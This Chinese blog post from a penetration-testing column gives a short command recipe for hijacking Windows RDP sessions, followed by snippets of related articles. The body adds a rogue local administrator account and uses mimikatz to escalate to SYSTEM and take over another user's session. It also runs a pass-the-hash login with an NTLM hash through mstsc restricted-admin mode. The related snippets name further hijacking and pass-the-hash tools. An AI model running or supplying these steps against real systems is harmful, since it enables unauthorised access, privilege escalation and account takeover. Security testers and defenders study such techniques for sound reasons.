关于RDP劫持小技巧

最新推荐文章于 2024-05-23 09:53:51 发布
最新推荐文章于 2024-05-23 09:53:51 发布
阅读量852 收藏 1
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adminxe/article/details/124197551
版权

mimikatz 权限提升 会话劫持 系统安全 Windows
关键词由CSDN通过智能技术生成

一、劫持方式1:

创建用户:

net user test 123.com /add net localgroup administrators test /add

登录后,使用mimikatz工具

privilege::debug #提权 

ts::sessions #查看当前主机的会话

token::elevate #提升本地管理员权限为system 

ts::remote /id:1 #劫持id为1的会话

二、劫持方式2:

mimikatz命令如下:

privilege::debug 

sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

执行后弹出远程登录界面,如下图 选择连接,成功实现远程登录

Adminxe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SharpRDPHijack:POC远程桌面(RDP)会话劫持实用程序,用于断开连接的会话
03-08
夏普RDPH劫持 Sharp RDP Hijack是用于断开会话的概念验证.NET / C#远程桌面协议(RDP)会话劫持实用程序 背景 RDP会话劫持是一种开发后技术,用于控制(强制)断开的交互式登录会话。 在描述了该技术。 笔记 SharpRDPHijack.cs在.NET Framework v.4下的Visual Studio 2019中进行编译。 会话劫持需要提升的(管理员)上下文才能连接到另一个会话。 除非知道目标会话用户的密码,否则需要NT AUTHORITY \ SYSTEM上下文来控制会话。 没有提供的密码,SharpRDPHijack将(试图)模拟NT AUTHORITY \ SYSTEM。 Windows 2019 Server会话劫持与先前的OS版本相比表现出有趣的行为。 劫持了重定向到活动RDP会话的会话后,Windows登录屏幕会提示您输入用户的密码/凭据
RDP会话劫持
Armandhe的博客
07-22 1934
这个我也觉得很骚气啊,只是原理并不清楚
探索安全边界:SharpRDPHijack - RDP会话劫持工具
最新发布
gitblog_00077的博客
05-23 376
探索安全边界:SharpRDPHijack - RDP会话劫持工具 项目地址:https://gitcode.com/bohops/SharpRDPHijack 在这个数字化的时代,系统安全评估与渗透测试显得尤为重要。今天,我们向您推荐一个独特的开源项目——SharpRDPHijack,这是一个基于.NET/C#的远程桌面协议(RDP)会话劫持实用程序,专门用于处理已断开的交互式登录会话。 项目简...
利用哈希传递登录 RDP 远程桌面
网络安全。
01-15 1095
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录。
内网渗透之PTH
cxk
06-03 3158
PTH (pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证 NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonU...
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 4986
windows的RDP-hash登录利用 在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
freerdp编译文件wfreerdp.exe
10-31
freerdp基于RDP协议,是一种专门用于远程桌面连接的协议。源码可以从github上下载,资源为编译后的exe文件,包含win32和win64 freerdp 常用参数说明: //远程电脑 wfreerdp.exe /u:用户名 /v:目标主机地址 //远程电脑...
低版本RDP升级RDP高版本
04-14
远程桌面协议(RDP,Remote Desktop Protocol)是微软提供的一种远程访问技术,允许用户通过网络连接到另一台计算机,从而实现远程控制、操作和访问该计算机的桌面环境。在IT领域,随着技术的发展,RDP的版本也在...
MultiRDPClient.NET-master_RDp_
09-30
【标题】"MultiRDPClient.NET-master RDp 客户端与管理器" 【描述】"这个项目专注于创建一个适用于Windows操作系统的多用户远程桌面协议(RDP)客户端及管理工具。它允许用户同时连接并管理多个远程桌面会话,提高...
RDP Wrapper对应的配置文件
02-13
RDP Wrapper对应的配置文件,支持10.0.1904.1503
windows下编译FreeRDP.zip
04-09
在Windows环境下编译FreeRDP是一项对初学者来说可能颇具挑战性的任务,因为涉及到许多步骤和技术细节。FreeRDP是一个开源的远程桌面协议(RDP)客户端,它允许用户通过命令行或其他应用程序接口与远程Windows系统进行...
rdp劫持学习
whojoe的博客
05-13 764
rdp劫持学习rdp服务确认启动通过注册表查询通过进程查看启动rdp中间人攻击登录shift后门结合rdp劫持多用户登录手动设置rdpwrap参考文章 rdp服务确认启动 通过注册表查询 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\C
〖教程〗RDP会话劫持 Ladon无密码登陆管理员桌面会话
K8哥哥
08-08 1233
前言 Windows系统下,tscon或任务管理器右键可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但在SYSTEM权限下可够绕过验证,无密码实现未授权登录。该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露,mimikat里面也有该功能,为了方便Ladon也添加了该功能。 背景 实战中某个项目的内网HTTPS证书有问题,特别奇葩不知为何,代理或CMD下无法连WEBSHELL,还有些远程连接程序管理员连着远程机器,特别是连着数据库的在自动处理数
如何悄无声息的对RDP和远程会话进行劫持
weixin_33709590的博客
09-20 568
本文讲的是如何悄无声息的对RDP和远程会话进行劫持?,Alexander Korznikov演示在没有登录服务器的情况下使用Sticky Keys和tscon访问管理员RDP会话: RDP会话连接的简要背景 如果你之前使用过远程桌面连接或者远程终端服务,那么你一定知道只有拥有账户密码才能进行登录。那么,你知道不用密码也可以进行登录吗?继续往下看吧。 ...
RDP劫持:如何透明劫持RDS以及RemoteApp会话
diansuimo2268的博客
03-11 499
https://www.anquanke.com/post/id/101525 转载于:https://www.cnblogs.com/7bit/p/10510677.html
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1466
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
内网渗透-域渗透简单思路
weixin_44110913的博客
10-16 4320
文章目录1.权限提升2.渗透姿势爆hash,爆aes key爆hash爆aes key3.远程登录注册表修改连接命令4.连接操作PTH攻击(利用明文或hash连接)IPC(明文连接主机)WMI(利用明文连接)SMB(利用明文或hash连接)RDP(利用明文或hash连接)WMI工具(利用明文或hash连接)PTK攻击(aes key 进行连接)PTT攻击(权限维持)Golden ticket(黄金票据)silver ticket(白银票据)5.bat批量连接测试 1.权限提升 一开始一定要提到admini
RDP之远程登录
战神/calmness的博客
06-23 2063
简述 最近搞内网渗透测试,发现得经常的去连接远程桌面,故此写一下整理一下笔记,巩固一下知识 rdp服务是我们常用的服务,可以不是3389端口,可以改成任意端口,时候为了利用它,必须先找出来服务端口,毕竟管理员也鸡贼。 查看RDP服务端口 查看rdp服务端口 REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber 得到连接端口为 0xd3d
mimikatz的基本使用
a3320315的博客
05-25 9777
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
关于default.rdp文件的困惑
06-01
default.rdp是一个存储连接设置的文件,它通常用于远程桌面连接。在Windows操作系统中,当你使用远程桌面连接到另一台计算机时,你可以保存连接设置并将其保存为default.rdp文件。这样,下次连接时,你只需要打开该文件即可连接到之前保存的计算机。 但是,需要注意的是,default.rdp文件可能包含敏感信息(例如用户名和密码),因此需要妥善保管。如果你不再需要连接到该计算机,应该删除default.rdp文件,以保护你的安全和隐私。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值